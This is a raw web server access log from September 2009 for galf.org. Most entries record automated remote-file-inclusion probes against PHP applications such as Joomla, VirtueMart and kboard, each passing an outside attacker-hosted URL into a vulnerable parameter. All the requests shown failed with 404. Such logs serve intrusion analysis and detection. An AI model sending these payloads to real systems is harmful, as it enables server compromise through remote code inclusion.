219.85.63.226 - - [07/Sep/2009:00:13:10 -0700] "GET /logs/access_090622.log%20%20/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:13:10 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:13:10 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:13:31 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:13:31 -0700] "GET /logs/access_090622.log%20%20/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:13:31 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:13:43 -0700] "GET /logs/access_090720.log%20%20/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:13:44 -0700] "GET /logs/access_090720.log%20%20/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:14:05 -0700] "GET /logs/access_090720.log%20%20/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:14:50 -0700] "GET /logs/access_090504.log%20%20/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.219.198.195 - - [07/Sep/2009:00:18:09 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://afgc.asso.fr/images/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.219.198.195 - - [07/Sep/2009:00:18:09 -0700] "GET /logs/access_090622.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://afgc.asso.fr/images/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.219.198.195 - - [07/Sep/2009:00:18:09 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://afgc.asso.fr/images/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.219.198.195 - - [07/Sep/2009:00:18:09 -0700] "GET /logs/access_090713.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://afgc.asso.fr/images/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.219.198.195 - - [07/Sep/2009:00:18:12 -0700] "GET /logs/access_090518.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://afgc.asso.fr/images/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.219.198.195 - - [07/Sep/2009:00:18:12 -0700] "GET /logs/access_090831.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://afgc.asso.fr/images/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.219.198.195 - - [07/Sep/2009:00:18:14 -0700] "GET /logs/access_090420.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://afgc.asso.fr/images/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.219.198.195 - - [07/Sep/2009:00:18:19 -0700] "GET /logs/access_090803.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://afgc.asso.fr/images/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:18:19 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:18:20 -0700] "GET /logs/access_090720.log%20%20/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:18:20 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:18:29 -0700] "GET /logs/access_090511.log%20%20/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:18:51 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:18:51 -0700] "GET /logs/access_090720.log%20%20/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:18:51 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.219.198.195 - - [07/Sep/2009:00:18:57 -0700] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://afgc.asso.fr/images/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:19:03 -0700] "GET /logs/access_090511.log%20%20/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.175.195.25 - - [07/Sep/2009:00:20:22 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.175.195.25 - - [07/Sep/2009:00:20:22 -0700] "GET /logs/access_090209.log%20%20//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.175.195.25 - - [07/Sep/2009:00:20:22 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.175.195.25 - - [07/Sep/2009:00:20:25 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.175.195.25 - - [07/Sep/2009:00:20:25 -0700] "GET /logs/access_090209.log%20%20//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.175.195.25 - - [07/Sep/2009:00:20:25 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:22:28 -0700] "GET /logs/access_090330.log%20%20/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:22:28 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:22:28 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.45 - - [07/Sep/2009:00:26:02 -0700] "GET /logs/access.log%20%20//cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
203.185.129.45 - - [07/Sep/2009:00:26:02 -0700] "GET /logs//cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
203.185.129.45 - - [07/Sep/2009:00:26:02 -0700] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
203.185.129.45 - - [07/Sep/2009:00:26:07 -0700] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
203.185.129.45 - - [07/Sep/2009:00:26:07 -0700] "GET /logs//cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
203.185.129.45 - - [07/Sep/2009:00:26:07 -0700] "GET /logs/access.log%20%20//cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
218.38.136.251 - - [07/Sep/2009:00:28:00 -0700] "GET /logs//main.php?sayfa=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:00:28:00 -0700] "GET /main.php?sayfa=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:00:28:01 -0700] "GET /logs/access_090608.log%20%20//main.php?sayfa=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:00:28:19 -0700] "GET /logs/access.log%20%20//main.php?sayfa=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.141.196.8 - - [07/Sep/2009:00:29:18 -0700] "GET /errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.141.196.8 - - [07/Sep/2009:00:29:18 -0700] "GET /logs/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.141.196.8 - - [07/Sep/2009:00:29:21 -0700] "GET /logs/access_090817.log/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:00:29:57 -0700] "GET /logs//main.php?sayfa=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:00:29:57 -0700] "GET /logs/access_090608.log%20%20//main.php?sayfa=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:00:29:57 -0700] "GET /main.php?sayfa=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:00:30:12 -0700] "GET /logs/access.log%20%20//main.php?sayfa=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [07/Sep/2009:00:30:32 -0700] "GET /class/class.dashboard_cms.php?where_framework=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.73.17.7 - - [07/Sep/2009:00:30:32 -0700] "GET /logs//class/class.dashboard_cms.php?where_framework=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.73.17.7 - - [07/Sep/2009:00:30:32 -0700] "GET /logs/access.log%20%20//class/class.dashboard_cms.php?where_framework=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
80.67.26.40 - - [07/Sep/2009:00:30:56 -0700] "GET /logs/access_090406.log%20%20/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:00:30:59 -0700] "GET /errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:00:30:59 -0700] "GET /logs/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [07/Sep/2009:00:31:46 -0700] "GET /logs/access.log%20%20//class/class.dashboard_cms.php?where_framework=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.73.17.7 - - [07/Sep/2009:00:31:46 -0700] "GET /logs//class/class.dashboard_cms.php?where_framework=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.73.17.7 - - [07/Sep/2009:00:31:46 -0700] "GET /class/class.dashboard_cms.php?where_framework=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
125.141.196.8 - - [07/Sep/2009:00:32:27 -0700] "GET /errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.141.196.8 - - [07/Sep/2009:00:32:27 -0700] "GET /logs/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.141.196.8 - - [07/Sep/2009:00:32:30 -0700] "GET /logs/access_090817.log/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.141.196.8 - - [07/Sep/2009:00:33:12 -0700] "GET /logs/access_090316.log%20%20/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.141.196.8 - - [07/Sep/2009:00:33:12 -0700] "GET /logs/access_090406.log%20%20/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:00:33:27 -0700] "GET /logs/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:00:33:27 -0700] "GET /logs/access_090406.log%20%20/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:00:34:35 -0700] "GET /errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:00:34:35 -0700] "GET /logs/access_090817.log/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:00:34:35 -0700] "GET /logs/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.45 - - [07/Sep/2009:00:34:47 -0700] "GET /logs/access.log//cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
203.185.129.45 - - [07/Sep/2009:00:34:47 -0700] "GET /logs//cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
203.185.129.45 - - [07/Sep/2009:00:34:47 -0700] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
125.141.196.8 - - [07/Sep/2009:00:35:15 -0700] "GET /logs/access_090316.log%20%20/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.141.196.8 - - [07/Sep/2009:00:35:18 -0700] "GET /logs/access_090406.log%20%20/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:00:35:49 -0700] "GET /logs/access_090406.log%20%20/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:00:35:49 -0700] "GET /errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:00:35:52 -0700] "GET /logs/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.45 - - [07/Sep/2009:00:36:54 -0700] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
203.185.129.45 - - [07/Sep/2009:00:36:54 -0700] "GET /logs//cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
203.185.129.45 - - [07/Sep/2009:00:36:54 -0700] "GET /logs/access.log//cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
80.67.26.40 - - [07/Sep/2009:00:37:16 -0700] "GET /logs/access_090302.log%20%20/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:00:38:07 -0700] "GET /errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:00:38:07 -0700] "GET /logs/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.141.56.136 - - [07/Sep/2009:00:42:46 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.141.56.136 - - [07/Sep/2009:00:43:28 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:00:46:46 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.246.252.166 - - [07/Sep/2009:00:47:13 -0700] "GET /logs/access_090706.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
66.246.252.166 - - [07/Sep/2009:00:47:13 -0700] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
66.246.252.166 - - [07/Sep/2009:00:47:13 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
61.47.7.71 - - [07/Sep/2009:00:47:34 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://saint56.pe.kr//bbs/skin/uks_vote_v3021/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:00:48:32 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:52:28 -0700] "GET /include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:52:28 -0700] "GET /logs/access_090216.log//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:52:28 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:52:31 -0700] "GET /include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:52:31 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:52:31 -0700] "GET /logs/access_090216.log//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:52:41 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:52:41 -0700] "GET /include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:52:44 -0700] "GET /logs/access_090216.log//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:52:49 -0700] "GET /include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:52:49 -0700] "GET /logs/access_090216.log//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:52:49 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:53:09 -0700] "GET /logs/access_090518.log//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:53:19 -0700] "GET /logs/access_090518.log//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:53:31 -0700] "GET /logs/access_090518.log//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:53:34 -0700] "GET /logs/access_090518.log//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [07/Sep/2009:00:53:35 -0700] "GET /logs/access_090720.log/kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
81.24.35.80 - - [07/Sep/2009:00:53:35 -0700] "GET /logs/kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
81.24.35.80 - - [07/Sep/2009:00:53:35 -0700] "GET /kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
